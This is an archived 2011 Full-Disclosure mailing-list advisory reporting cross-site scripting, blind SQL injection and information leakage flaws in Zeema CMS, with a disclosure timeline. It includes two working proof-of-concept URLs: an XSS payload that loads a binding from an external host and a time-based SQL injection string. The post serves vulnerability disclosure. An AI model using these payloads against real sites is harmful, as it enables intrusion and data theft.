[<prev] [next>] [day] [month] [year] [list]
Message-ID: <001e01ccb527$3d0f8100$9b7a6fd5@ml>
Date: Wed, 7 Dec 2011 23:26:15 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: XSS, SQLi and IL vulnerabilities in Zeema CMS
Hello list!
I want to warn you about Cross-Site Scripting, SQL Injection and Information
Leakage vulnerabilities in Zeema CMS. It's Ukrainian commercial CMS.
-------------------------
Affected products:
-------------------------
Vulnerable are all versions of Zeema CMS.
----------
Details:
----------
XSS (WASC-08):
http://site/counter/?act=ip&ip_addr=%3Cp%20style=-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)%3E
Attack will work in Mozilla and Firefox.
SQL Injection (WASC-19):
http://site/counter/?act=ip&ip_addr=%27%20and%20benchmark(10000000,md5(now()))%23
This is blind SQL Injection.
Information Leakage (WASC-13):
Site's statistic http://site/counter/ is in public access (and the path to
it is easy to find).
------------
Timeline:
------------
2011.09.12 - found vulnerabilities during audit. After that client straight
away informed developers.
2011.10.27 - announced at my site.
2011.10.28 - informed developers.
2011.12.07 - disclosed at my site.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/5467/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists